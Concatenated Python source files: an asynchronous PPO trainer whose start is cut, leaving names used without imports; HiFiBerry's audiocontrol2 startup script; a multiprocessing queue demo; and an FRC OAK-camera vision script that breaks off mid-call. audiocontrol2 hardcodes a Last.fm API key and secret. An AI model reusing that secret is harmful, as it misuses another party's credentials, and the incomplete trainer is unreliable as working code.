import signal
import time
from rmsprop_applier import RMSPropApplier
import threading
from multiprocessing.managers import BaseManager
import multiprocessing as mp
import tensorflow as tf
class MPManager(BaseManager):
pass
MPManager.register('Policy', Policy)
MPManager.register('NNValueFunction', NNValueFunction)
N_WORKERS = 3
RMSP_ALPHA = 0.99
RMSP_EPSILON = 0.1
GRAD_NORM_CLIP = 40.0
DEVICE = device = "/cpu:0"
class GracefulKiller:
""" Gracefully exit program on CTRL-C """
def __init__(self):
self.kill_now = False
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
def exit_gracefully(self, signum, frame):
self.kill_now = True
def init_gym(env_name):
"""
Initialize gym environment, return dimension of observation
and action spaces.
Args:
env_name: str environment name (e.g. "Humanoid-v1")
Returns: 3-tuple
gym environment (object)
number of observation dimensions (int)
number of action dimensions (int)
"""
env = gym.make(env_name)
obs_dim = env.observation_space.shape[0]
act_dim = env.action_space.shape[0]
return env, obs_dim, act_dim
def run_episode(sess, env, policy, scaler, animate=False):
""" Run single episode with option to animate
Args:
env: ai gym environment
policy: policy object with sample() method
scaler: scaler object, used to scale/offset each observation dimension
to a similar range
animate: boolean, True uses env.render() method to animate episode
Returns: 4-tuple of NumPy arrays
observes: shape = (episode len, obs_dim)
actions: shape = (episode len, act_dim)
rewards: shape = (episode len,)
unscaled_obs: useful for training scaler, shape = (episode len, obs_dim)
"""
obs = env.reset()
observes, actions, rewards, unscaled_obs = [], [], [], []
done = False
step = 0.0
scale, offset = scaler.get()
scale[-1] = 1.0 # don't scale time step feature
offset[-1] = 0.0 # don't offset time step feature
while not done:
if animate:
env.render()
obs = obs.astype(np.float32).reshape((1, -1))
obs = np.append(obs, [[step]], axis=1) # add time step feature
unscaled_obs.append(obs)
obs = (obs - offset) * scale # center and scale observations
observes.append(obs)
action = policy.sample(sess, obs).reshape((1, -1)).astype(np.float32)
actions.append(action)
obs, reward, done, _ = env.step(np.squeeze(action, axis=0))
if not isinstance(reward, float):
reward = np.asscalar(reward)
rewards.append(reward)
step += 1e-3 # increment time step feature
return (np.concatenate(observes), np.concatenate(actions),
np.array(rewards, dtype=np.float64), np.concatenate(unscaled_obs))
def run_policy(sess, env, policy, scaler, logger, episodes):
""" Run policy and collect data for a minimum of min_steps and min_episodes
Args:
env: ai gym environment
policy: policy object with sample() method
scaler: scaler object, used to scale/offset each observation dimension
to a similar range
logger: logger object, used to save stats from episodes
episodes: total episodes to run
Returns: list of trajectory dictionaries, list length = number of episodes
'observes' : NumPy array of states from episode
'actions' : NumPy array of actions from episode
'rewards' : NumPy array of (un-discounted) rewards from episode
        'unscaled_obs' : NumPy array of unscaled observations from episode
"""
total_steps = 0
trajectories = []
for _ in range(episodes):
observes, actions, rewards, unscaled_obs = run_episode(sess, env, policy, scaler)
total_steps += observes.shape[0]
trajectory = {'observes': observes,
'actions': actions,
'rewards': rewards,
'unscaled_obs': unscaled_obs}
trajectories.append(trajectory)
unscaled = np.concatenate([t['unscaled_obs'] for t in trajectories])
scaler.update(unscaled) # update running statistics for scaling observations
logger.log({'_MeanReward': np.mean([t['rewards'].sum() for t in trajectories]),
'Steps': total_steps})
return trajectories
def discount(x, gamma):
""" Calculate discounted forward sum of a sequence at each point """
return scipy.signal.lfilter([1.0], [1.0, -gamma], x[::-1])[::-1]
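# Worked example: discount([1.0, 1.0, 1.0], 0.9) computes, from the end,
#   [1 + 0.9 * 1.9, 1 + 0.9 * 1.0, 1.0] == [2.71, 1.9, 1.0]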
def add_disc_sum_rew(trajectories, gamma):
""" Adds discounted sum of rewards to all time steps of all trajectories
Args:
trajectories: as returned by run_policy()
gamma: discount
Returns:
None (mutates trajectories dictionary to add 'disc_sum_rew')
"""
for trajectory in trajectories:
if gamma < 0.999: # don't scale for gamma ~= 1
rewards = trajectory['rewards'] * (1 - gamma)
else:
rewards = trajectory['rewards']
disc_sum_rew = discount(rewards, gamma)
trajectory['disc_sum_rew'] = disc_sum_rew
def add_value(sess, trajectories, val_func):
""" Adds estimated value to all time steps of all trajectories
Args:
trajectories: as returned by run_policy()
val_func: object with predict() method, takes observations
and returns predicted state value
Returns:
None (mutates trajectories dictionary to add 'values')
"""
for trajectory in trajectories:
observes = trajectory['observes']
values = val_func.predict(sess, observes)
trajectory['values'] = values
def add_gae(trajectories, gamma, lam):
""" Add generalized advantage estimator.
https://arxiv.org/pdf/1506.02438.pdf
Args:
trajectories: as returned by run_policy(), must include 'values'
key from add_value().
gamma: reward discount
lam: lambda (see paper).
lam=0 : use TD residuals
lam=1 : A = Sum Discounted Rewards - V_hat(s)
Returns:
None (mutates trajectories dictionary to add 'advantages')
"""
for trajectory in trajectories:
if gamma < 0.999: # don't scale for gamma ~= 1
rewards = trajectory['rewards'] * (1 - gamma)
else:
rewards = trajectory['rewards']
values = trajectory['values']
# temporal differences
tds = rewards - values + np.append(values[1:] * gamma, 0)
advantages = discount(tds, gamma * lam)
trajectory['advantages'] = advantages
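# The loop above implements GAE (https://arxiv.org/pdf/1506.02438.pdf):
#   delta_t = r_t + gamma * V(s_{t+1}) - V(s_t)         (the 'tds' array)
#   A_t     = sum_{l>=0} (gamma * lam)^l * delta_{t+l}  (computed via discount())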
def build_train_set(trajectories):
"""
Args:
trajectories: trajectories after processing by add_disc_sum_rew(),
add_value(), and add_gae()
Returns: 4-tuple of NumPy arrays
observes: shape = (N, obs_dim)
actions: shape = (N, act_dim)
advantages: shape = (N,)
disc_sum_rew: shape = (N,)
"""
observes = np.concatenate([t['observes'] for t in trajectories])
actions = np.concatenate([t['actions'] for t in trajectories])
disc_sum_rew = np.concatenate([t['disc_sum_rew'] for t in trajectories])
advantages = np.concatenate([t['advantages'] for t in trajectories])
# normalize advantages
advantages = (advantages - advantages.mean()) / (advantages.std() + 1e-6)
return observes, actions, advantages, disc_sum_rew
def log_batch_stats(observes, actions, advantages, disc_sum_rew, logger, episode, time):
""" Log various batch statistics """
logger.log({'_mean_obs': np.mean(observes),
'_min_obs': np.min(observes),
'_max_obs': np.max(observes),
'_std_obs': np.mean(np.var(observes, axis=0)),
'_mean_act': np.mean(actions),
'_min_act': np.min(actions),
'_max_act': np.max(actions),
'_std_act': np.mean(np.var(actions, axis=0)),
'_mean_adv': np.mean(advantages),
'_min_adv': np.min(advantages),
'_max_adv': np.max(advantages),
'_std_adv': np.var(advantages),
'_mean_discrew': np.mean(disc_sum_rew),
'_min_discrew': np.min(disc_sum_rew),
'_max_discrew': np.max(disc_sum_rew),
'_std_discrew': np.var(disc_sum_rew),
'_Episode': episode,
'_Time': time
})
def main(env_name, num_episodes, gamma, lam, kl_targ, batch_size, hid1_mult, policy_logvar):
    """ Main entry point: builds the shared policy and value function, spawns
    N_WORKERS asynchronous worker threads running single_work(), and trains
    PPO on the given OpenAI Gym environment. See the argparse section below
    for the meaning of each argument.
    """
##################
# shared policy #
##################
tic = time.clock()
    manager = MPManager()
    manager.start()
shared_env, shared_obs_dim, shared_act_dim = init_gym(env_name)
shared_obs_dim += 1 # add 1 to obs dimension for time step feature (see run_episode())
now = datetime.utcnow().strftime("%b-%d_%H:%M:%S") # create unique directories
shared_logger = Logger(logname=env_name, now=now+"-Master")
    shared_aigym_path = os.path.join('./video', env_name, now+"-Master")
#env = wrappers.Monitor(env, aigym_path, force=True)
shared_scaler = Scaler(shared_obs_dim)
shared_val_func = NNValueFunction(shared_obs_dim, hid1_mult, -1, None)
shared_policy = Policy(shared_obs_dim, shared_act_dim, kl_targ, hid1_mult, policy_logvar, -1, None)
learning_rate_input = tf.placeholder("float")
grad_applier = RMSPropApplier(learning_rate = learning_rate_input,
decay = RMSP_ALPHA,
momentum = 0.0,
epsilon = RMSP_EPSILON,
clip_norm = GRAD_NORM_CLIP,
device = device)
    # local policy declarations
env_a = [None]*N_WORKERS
obs_dim_a = [None]*N_WORKERS
act_dim_a = [None]*N_WORKERS
logger_a = [None]*N_WORKERS
aigym_path_a = [None]*N_WORKERS
now = datetime.utcnow().strftime("%b-%d_%H:%M:%S") # create unique directories
val_func_a = [None]*N_WORKERS
policy_a = [None]*N_WORKERS
scaler_a = [None]*N_WORKERS
for i in range(N_WORKERS):
env_a[i], obs_dim_a[i], act_dim_a[i] = init_gym(env_name)
obs_dim_a[i] += 1 # add 1 to obs dimension for time step feature (see run_episode())
logger_a[i] = Logger(logname=env_name, now=now+"-"+str(i))
        aigym_path_a[i] = os.path.join('./video', env_name, now+"-"+str(i))
#env_a[i] = wrappers.Monitor(env, aigym_path, force=True)
scaler_a[i] = Scaler(obs_dim_a[i])
val_func_a[i] = NNValueFunction(obs_dim_a[i], hid1_mult, i, shared_val_func)
val_func_a[i].apply_gradients = grad_applier.apply_gradients(
shared_val_func.get_vars(),
val_func_a[i].gradients )
policy_a[i] = Policy(obs_dim_a[i], act_dim_a[i], kl_targ, hid1_mult, policy_logvar, i, shared_policy)
policy_a[i].apply_gradients = grad_applier.apply_gradients(
shared_policy.get_vars(),
policy_a[i].gradients )
# init tensorflow
sess = tf.Session(config=tf.ConfigProto(log_device_placement=False,allow_soft_placement=True))
init = tf.global_variables_initializer()
## start sess
sess.run(init)
## init shared scalar policy
run_policy(sess, shared_env, shared_policy, shared_scaler, shared_logger, episodes=5)
def single_work(thread_idx):
""" training loop
Args:
env_name: OpenAI Gym environment name, e.g. 'Hopper-v1'
num_episodes: maximum number of episodes to run
gamma: reward discount factor (float)
lam: lambda from Generalized Advantage Estimate
kl_targ: D_KL target for policy update [D_KL(pi_old || pi_new)
batch_size: number of episodes per policy training batch
hid1_mult: hid1 size for policy and value_f (mutliplier of obs dimension)
policy_logvar: natural log of initial policy variance
"""
env = env_a[thread_idx]
policy = policy_a[thread_idx]
#obs_dim = obs_dim_a[thread_idx]
#act_dim = act_dim_a[thread_idx]
logger = logger_a[thread_idx]
aigym_path = aigym_path_a[thread_idx]
scaler = scaler_a[thread_idx]
val_func = val_func_a[thread_idx]
print("=== start thread "+str(policy.get_thread_idx())+" "+ policy.get_scope()+" ===")
print(shared_policy.get_vars())
print(policy.get_vars())
# run a few episodes of untrained policy to initialize scaler:
#run_policy(sess, env, policy, scaler, logger, episodes=5)
#policy.sync(shared_policy)
#val_func.sync(shared_val_func)
episode = 0
while episode < num_episodes:
## copy global var into local
sess.run( policy.sync)
sess.run(val_func.sync)
## compute new model on local policy
trajectories = run_policy(sess, env, policy, scaler, logger, episodes=batch_size)
episode += len(trajectories)
add_value(sess, trajectories, val_func) # add estimated values to episodes
add_disc_sum_rew(trajectories, gamma) # calculated discounted sum of Rs
add_gae(trajectories, gamma, lam) # calculate advantage
# concatenate all episodes into single NumPy arrays
observes, actions, advantages, disc_sum_rew = build_train_set(trajectories)
# add various stats to training log:
log_batch_stats(observes, actions, advantages, disc_sum_rew, logger, episode, time.clock()-tic)
policy.update(sess, observes, actions, advantages, logger) # update policy
val_func.fit(sess, observes, disc_sum_rew, logger) # update value function
#cur_learning_rate = self._anneal_learning_rate(global_t)
feed_dict = {
policy.old_log_vars_ph: policy.old_log_vars_np,
policy.old_means_ph: policy.old_means_np,
policy.obs_ph: observes,
policy.act_ph: actions,
policy.advantages_ph: advantages,
policy.beta_ph: policy.beta,
policy.lr_ph: policy.lr,
policy.eta_ph: policy.eta,
learning_rate_input: policy.lr
}
sess.run( policy.apply_gradients, feed_dict)
shared_policy.update(sess, observes, actions, advantages, shared_logger)
feed_dict = {
val_func.obs_ph: observes,
val_func.val_ph: disc_sum_rew,
learning_rate_input: val_func.lr
}
sess.run( val_func.apply_gradients, feed_dict)
shared_val_func.fit(sess, observes, disc_sum_rew, shared_logger)
shared_logger.log({'_Time':time.clock()-tic})
logger.write(display=True) # write logger results to file and stdout
logger.close()
## end def single work
train_threads = []
for i in range(N_WORKERS):
train_threads.append(threading.Thread(target=single_work, args=(i,)))
[t.start() for t in train_threads]
[t.join() for t in train_threads]
saver = tf.train.Saver()
for i in range(N_WORKERS):
logger_a[i].close()
#path = os.path.join('log-files', env_name, now+'-Master', 'checkpoint')
#saver.save(sess, path )
sess.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=('Train policy on OpenAI Gym environment '
'using Proximal Policy Optimizer'))
parser.add_argument('env_name', type=str, help='OpenAI Gym environment name')
parser.add_argument('-n', '--num_episodes', type=int, help='Number of episodes to run',
default=1000)
parser.add_argument('-g', '--gamma', type=float, help='Discount factor', default=0.995)
parser.add_argument('-l', '--lam', type=float, help='Lambda for Generalized Advantage Estimation',
default=0.98)
parser.add_argument('-k', '--kl_targ', type=float, help='D_KL target value',
default=0.003)
parser.add_argument('-b', '--batch_size', type=int,
help='Number of episodes per training batch',
default=20)
parser.add_argument('-m', '--hid1_mult', type=int,
                    help='Size of first hidden layer for value and policy NNs '
'(integer multiplier of observation dimension)',
default=10)
parser.add_argument('-v', '--policy_logvar', type=float,
help='Initial policy log-variance (natural log of variance)',
default=-1.0)
args = parser.parse_args()
main(**vars(args))
|
audiocontrol2.py
|
'''
Copyright (c) 2019 Modul 9/HiFiBerry
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
'''
This is the main audio control process that reads the configuration file,
initializes all subsystems and starts the required threads.
Functionality is implemented in the ac2.* modules
'''
import signal
import configparser
import logging
import os
import sys
import threading
from usagecollector.client import report_activate
from ac2.controller import AudioController
import ac2.data.lastfm as lastfmdata
from ac2.plugins.metadata.lastfm import LastFMScrobbler
from ac2.webserver import AudioControlWebserver
from ac2.alsavolume import ALSAVolume
from ac2.metadata import Metadata
import ac2.metadata
from ac2.data.mpd import MpdMetadataProcessor
from ac2.players.mpdcontrol import MPDControl
from ac2.players.vollibrespot import VollibspotifyControl
from ac2.players.vollibrespot import MYNAME as SPOTIFYNAME
from ac2 import watchdog
mpris = AudioController()
startup_command = None
def pause_all(signalNumber=None, frame=None):
"""
Pause all players on SIGUSR1
"""
if mpris is not None:
mpris.pause_all()
def print_state(signalNumber=None, frame=None):
"""
Display state on USR2
"""
if mpris is not None:
print("\n" + str(mpris))
def create_object(classname, param = None):
# [module_name, class_name] = classname.rsplit(".", 1)
# module = __import__(module_name)
# my_class = getattr(module, class_name)
import importlib
module_name, class_name = classname.rsplit(".", 1)
MyClass = getattr(importlib.import_module(module_name), class_name)
if param is None:
instance = MyClass()
else:
instance = MyClass(param)
return instance
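# Example (illustrative, hypothetical class path):
#   create_object("mypkg.displays.MyDisplay", params)
# is roughly equivalent to:
#   from mypkg.displays import MyDisplay
#   instance = MyDisplay(params)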
def parse_config(debugmode=False):
server = None
config = configparser.ConfigParser()
config.optionxform = lambda option: option
config.read("/etc/audiocontrol2.conf")
# Auto pause for mpris players
auto_pause = False
if "mpris" in config.sections():
auto_pause = config.getboolean("mpris", "auto_pause",
fallback=False)
loop_delay = config.getint("mpris", "loop_delay",
fallback=1)
mpris.loop_delay = loop_delay
ignore_players = []
for p in config.get("mpris", "ignore",
fallback="").split(","):
playername = p.strip()
ignore_players.append(playername)
logging.info("Ignoring player %s", playername)
mpris.ignore_players = ignore_players
logging.debug("setting auto_pause for MPRIS players to %s",
auto_pause)
mpris.auto_pause = auto_pause
# Web server
if config.getboolean("webserver", "enable", fallback=False):
logging.debug("starting webserver")
port = config.getint("webserver",
"port",
fallback=80)
token = config.get("webserver", "authtoken", fallback=None)
server = AudioControlWebserver(port=port, authtoken=token, debug=debugmode)
mpris.register_metadata_display(server)
server.set_player_control(mpris)
server.add_updater(mpris)
server.start()
watchdog.add_monitored_thread(server, "webserver")
report_activate("audiocontrol_webserver")
logging.info("started web server on port %s", port)
else:
logging.error("web server disabled")
# LastFMScrobbler/LibreFM
if "lastfm" in config.sections():
network = config.get("lastfm", "network",
fallback="lastfm").lower()
username = config.get("lastfm", "username",
fallback=None)
password = config.get("lastfm", "password",
fallback=None)
if network == "lastfm":
apikey = "7d2431d8bb5608574b59ea9c7cfe5cbd"
apisecret = "4722fea27727367810eb550759fa479f"
elif network == "librefm":
apikey = "hifiberry"
apisecret = "hifiberryos"
logging.info("Last.FM network %s", network)
if network is not None:
anon = False
if username is None or username == "" or \
password is None or password == "":
logging.info("using %s anonymously, not scrobbling", network)
username = None
password = None
anon = True
if not(anon):
try:
lastfmscrobbler = LastFMScrobbler(apikey,
apisecret,
username,
password,
None,
network)
mpris.register_metadata_display(lastfmscrobbler)
logging.info("scrobbling to %s as %s", network, username)
lastfmdata.set_lastfmuser(username)
if server is not None:
server.add_lover(lastfmscrobbler)
Metadata.loveSupportedDefault = True
report_activate("audiocontrol_lastfm_scrobble")
except Exception as e:
logging.error("error setting up lastfm module: %s", e)
else:
logging.info("Last.FM not configured")
# Watchdog
if "watchdog" in config.sections():
for player in config["watchdog"]:
services = config["watchdog"][player].split(",")
watchdog.player_mapping[player] = services
logging.info("configuring watchdog %s: %s",
player, services)
# Volume
volume_control = None
if "volume" in config.sections():
mixer_name = config.get("volume",
"mixer_control",
fallback=None)
if mixer_name is not None:
volume_control = ALSAVolume(mixer_name)
logging.info("monitoring mixer %s", mixer_name)
if server is not None:
volume_control.add_listener(server)
server.volume_control = volume_control
volume_control.start()
watchdog.add_monitored_thread(volume_control, "volume control")
mpris.set_volume_control(volume_control)
report_activate("audiocontrol_volume")
if volume_control is None:
logging.info("volume control not configured, "
"disabling volume control support")
# Additional controller modules
for section in config.sections():
if section.startswith("controller:"):
[_,classname] = section.split(":",1)
try:
params = config[section]
controller = create_object(classname, params)
controller.set_player_control(mpris)
controller.set_volume_control(volume_control)
controller.start()
logging.info("started controller %s", controller)
report_activate("audiocontrol_controller_"+classname)
except Exception as e:
logging.error("Exception during controller %s initialization",
classname)
logging.exception(e)
if section.startswith("metadata:"):
[_,classname] = section.split(":",1)
try:
params = config[section]
metadata_display = create_object(classname, params)
mpris.register_metadata_display(metadata_display)
                if volume_control is not None:
                    volume_control.add_listener(metadata_display)
                logging.info("registered metadata display %s", metadata_display)
report_activate("audiocontrol_metadata_"+classname)
except Exception as e:
logging.error("Exception during controller %s initialization",
classname)
logging.exception(e)
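    # Illustrative config snippet for the two section types handled above
    # (the class paths are hypothetical placeholders):
    #   [controller:mypkg.controllers.MyController]
    #   some_option = value
    #
    #   [metadata:mypkg.displays.MyDisplay]
    #   other_option = value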
# Metadata push to GUI
if "metadata_post" in config.sections():
try:
from ac2.plugins.metadata.http_post import MetadataHTTPRequest
url = config.get("metadata_post",
"url",
fallback=None)
if url is None:
logging.error("can't activate metadata_post, url missing")
else:
logging.info("posting metadata to %s", url)
metadata_pusher = MetadataHTTPRequest(url)
mpris.register_metadata_display(metadata_pusher)
except Exception as e:
logging.error("can't activate metadata_post: %s", e)
# Metadata push to GUI
if "volume_post" in config.sections():
if volume_control is None:
logging.info("volume control not configured, "
"can't use volume_post")
try:
from ac2.plugins.volume.http import VolumeHTTPRequest
url = config.get("volume_post",
"url",
fallback=None)
if url is None:
logging.error("can't activate volume_post, url missing")
else:
logging.info("posting volume changes to %s", url)
volume_pusher = VolumeHTTPRequest(url)
volume_control.add_listener(volume_pusher)
except Exception as e:
logging.error("can't activate volume_post: %s", e)
# Native MPD backend and metadata processor
if "mpd" in config.sections():
mpdc = MPDControl()
mpdc.start()
mpris.register_nonmpris_player("mpd",mpdc)
logging.info("registered non-MPRIS mpd backend")
mpddir=config.get("mpd", "musicdir",fallback=None)
if mpddir is not None:
mpdproc = MpdMetadataProcessor(mpddir)
mpris.register_metadata_processor(mpdproc)
logging.info("added MPD cover art handler on %s",mpddir)
# Vollibrespot
vlrctl = VollibspotifyControl()
vlrctl.start()
mpris.register_nonmpris_player(SPOTIFYNAME,vlrctl)
# Other settings
if "privacy" in config.sections():
extmd = config.getboolean("privacy",
"external_metadata",
fallback=True)
if extmd:
logging.info("external metadata enabled")
ac2.metadata.external_metadata = True
else:
logging.info("external metadata disabled")
ac2.metadata.external_metadata = False
else:
logging.info("no privacy settings found, using defaults")
logging.debug("ac2.md.extmd %s", ac2.metadata.external_metadata)
# Web server has to rewrite artwork URLs
if server is not None:
mpris.register_metadata_processor(server)
logging.info("enabled web server meta data processor")
# Other system settings
global startup_command
startup_command = config.get("system", "startup-finished", fallback=None)
if debugmode:
from ac2.dev.dummydata import DummyMetadataCreator
dummy = DummyMetadataCreator(server, interval=3)
dummy.start()
def main():
if len(sys.argv) > 1:
if "-v" in sys.argv:
logging.basicConfig(format='%(levelname)s: %(module)s - %(message)s',
level=logging.DEBUG)
logging.debug("enabled verbose logging")
else:
logging.basicConfig(format='%(levelname)s: %(module)s - %(message)s',
level=logging.INFO)
if ('DEBUG' in os.environ):
logging.warning("starting in debug mode...")
debugmode = True
else:
debugmode = False
parse_config(debugmode=debugmode)
monitor = threading.Thread(target=watchdog.monitor_threads_and_exit)
monitor.start()
logging.info("started thread monitor for %s",
",".join(watchdog.monitored_threads.keys()))
signal.signal(signal.SIGUSR1, pause_all)
signal.signal(signal.SIGUSR2, print_state)
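    # e.g. from a shell: "kill -USR1 <pid>" pauses all players,
    # "kill -USR2 <pid>" prints the current player state.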
logging.info("startup finished")
if startup_command is not None:
os.system(startup_command)
# mpris.print_players()
try:
mpris.main_loop()
except Exception as e:
logging.error("main loop crashed with exception %s", e)
logging.exception(e)
logging.info("Main thread stopped")
main()
|
demo02.py
|
from multiprocessing import JoinableQueue,Process
def customer (queue) :
while True:
r = queue.get()
print("消费:" + r)
queue.task_done() # 消费完成, 通知继续生产
def product(queue,name) :
for i in range(10):
queue.put(name)
print("生产骨头")
queue.join() # 阻塞当前,让队列中其他执行
if __name__ == '__main__':
queue = JoinableQueue()
cus = Process(target=customer,args=(queue,))
    cus.daemon = True  # must be set before start(); has no effect once the process is running
    pro = Process(target=product, args=(queue, "bone"))
cus.start()
pro.start()
print("e")
|
main.py
|
#!/usr/bin/env python3
import argparse
import threading
from time import sleep
import cv2
import depthai as dai
import socket
from common import target_finder
from common.config import NN_IMG_SIZE
from pipelines import object_tracker_detection, object_edge_detection
import logging
from common.mjpeg_stream import MjpegStream
from networktables.util import NetworkTables
from common.utils import FPSHandler
parser = argparse.ArgumentParser()
parser.add_argument('-d', dest='debug', action="store_true", default=False, help='Start in Debug Mode')
args = parser.parse_args()
log = logging.getLogger(__name__)
class Main:
def __init__(self):
log.info("Connected Devices:")
for device in dai.Device.getAllAvailableDevices():
log.info(f"{device.getMxId()} {device.state}")
self.init_networktables()
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip_address = s.getsockname()[0]
        except Exception:
ip_address = 'localhost'
port1 = 4201
port2 = 4202
self.device_list = {"OAK-1": {
'name': "OAK-1",
'id': "14442C10C14F47D700",
# 'id': "14442C1011043ED700",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port1),
'nt_tab': NetworkTables.getTable("OAK-1")
}, "OAK-2": {
'name': "OAK-2",
# 'id': "14442C10C14F47D700",
'id': "14442C1011043ED700",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port2),
'nt_tab': NetworkTables.getTable("OAK-2")
}}
self.goal_pipeline, self.goal_labels = object_edge_detection.create_pipeline("infiniteRecharge2021")
self.object_pipeline, self.object_labels = object_tracker_detection.create_pipeline("infiniteRecharge2021")
self.oak_1_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port1, colorspace='BW')
self.oak_2_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port2)
def parse_goal_frame(self, frame, edgeFrame, bboxes):
valid_labels = ['red_upper_power_port', 'blue_upper_power_port']
nt_tab = self.device_list['OAK-1']['nt_tab']
if len(bboxes) == 0:
nt_tab.putString("target_label", "None")
nt_tab.putNumber("tv", 0)
for bbox in bboxes:
target_label = self.goal_labels[bbox['label']]
if target_label not in valid_labels:
continue
edgeFrame, target_x, target_y = target_finder.find_largest_contour(edgeFrame, bbox)
if target_x == -999 or target_y == -999:
log.error("Error: Could not find target contour")
continue
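            # Assumption: 68.7938... looks like the camera's horizontal field of
            # view in degrees and 1920 the full sensor width in pixels, so this
            # converts the pixel offset from the image centre into an angle.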
angle_offset = ((NN_IMG_SIZE / 2.0) - target_x) * 68.7938003540039 / 1920
if abs(angle_offset) > 30:
log.info("Invalid angle offset. Setting it to 0")
nt_tab.putNumber("tv", 0)
angle_offset = 0
else:
log.info("Found target '{}'\tX Angle Offset: {}".format(target_label, angle_offset))
nt_tab.putNumber("tv", 1)
nt_tab.putString("target_label", target_label)
nt_tab.putNumber("tx", angle_offset)
cv2.rectangle(edgeFrame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), (255, 255, 255), 2)
cv2.circle(edgeFrame, (int(round(target_x, 0)), int(round(target_y, 0))), radius=5, color=(128, 128, 128), thickness=-1)
bbox['target_x'] = target_x
bbox['target_y'] = target_y
bbox['angle_offset'] = angle_offset
fps = self.device_list['OAK-1']['fps_handler']
fps.next_iter()
cv2.putText(edgeFrame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
self.oak_1_stream.send_frame(edgeFrame)
return frame, edgeFrame, bboxes
def parse_object_frame(self, frame, bboxes):
valid_labels = ['power_cell']
nt_tab = self.device_list['OAK-2']['nt_tab']
power_cell_counter = 0
for bbox in bboxes:
target_label = self.object_labels[bbox['label']]
if target_label not in valid_labels:
continue
power_cell_counter += 1
box_color = (0, 150, 150)
if power_cell_counter >= 5:
box_color = (0, 255, 0)
elif power_cell_counter < 3:
box_color = (0, 0, 255)
for bbox in bboxes:
cv2.rectangle(frame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), box_color, 2)
nt_tab.putNumber("powercells", power_cell_counter)
nt_tab.putBoolean("indexer_full", power_cell_counter >= 5)
fps = self.device_list['OAK-2']['fps_handler']
fps.next_iter()
cv2.putText(frame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
self.oak_2_stream.send_frame(frame)
return frame, bboxes
def init_networktables(self):
NetworkTables.startClientTeam(4201)
if not NetworkTables.isConnected():
log.info("Could not connect to team client. Trying other addresses...")
NetworkTables.startClient([
'10.42.1.2',
'127.0.0.1',
'10.0.0.2',
'192.168.100.108'
])
if NetworkTables.isConnected():
log.info("NT Connected to {}".format(NetworkTables.getRemoteAddress()))
return True
else:
log.error("Could not connect to NetworkTables. Restarting server...")
return False
def run(self):
log.info("Setup complete, parsing frames...")
threadlist = []
try:
found_1, device_info_1 = dai.Device.getDeviceByMxId(self.device_list['OAK-1']['id'])
self.device_list['OAK-1']['nt_tab'].putBoolean("OAK-1 Status", found_1)
if found_1:
th1 = threading.Thread(target=self.run_goal_detection, args=(device_info_1,))
th1.start()
threadlist.append(th1)
found_2, device_info_2 = dai.Device.getDeviceByMxId(self.device_list['OAK-2']['id'])
self.device_list['OAK-2']['nt_tab'].putBoolean("OAK-2 Status", found_2)
if found_2:
th2 = threading.Thread(target=self.run_object_detection, args=(device_info_2,))
th2.start()
threadlist.append(th2)
while True:
for t in threadlist:
if not t.is_alive():
break
sleep(10)
finally:
log.info("Exiting Program...")
def run_goal_detection(self, device_info):
self.device_list['OAK-1']['nt_tab'].putString("OAK-1 Stream", self.device_list['OAK-1']['stream_address'])
for frame, edgeFrame, bboxes in object_edge_detection.capture(device_info):
self.parse_goal_frame(frame, edgeFrame, bboxes)
def run_object_detection(self, device_info):
self.device_list['OAK-1']['nt_tab'].putString("OAK-2 Stream", self.device_list['OAK-2']['stream_address'])
for frame, bboxes in object_tracker_detection.capture(device_info):
self.parse_object_frame(frame, bboxes)
class MainDebug(Main):
def __init__(self):
super().__init__()
def parse_goal_frame(self, frame, edgeFrame, bboxes):
frame, edgeFrame, bboxes = super().parse_goal_frame(frame, edgeFrame, bboxes)
valid_labels = ['red_upper_power_port', 'blue_upper_power_port']
for bbox in bboxes:
target_label = self.goal_labels[bbox['label']]
if target_label not in valid_labels:
continue
if 'target_x' not in bbox:
continue
target_x = bbox['target_x'] if 'target_x' in bbox else 0
angle_offset = bbox['angle_offset'] if 'angle_offset' in bbox else 0
cv2.rectangle(frame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), (0, 255, 0), 2)
cv2.putText(frame, "x: {}".format(round(target_x, 2)), (bbox['x_min'], bbox['y_min'] + 30),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "y: {}".format(round(bbox['y_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 50),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "angle: {}".format(round(angle_offset, 3)), (bbox['x_min'], bbox['y_min'] + 70),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "conf: {}".format(round(bbox['confidence'], 2)), (bbox['x_min'], bbox['y_min'] + 90),
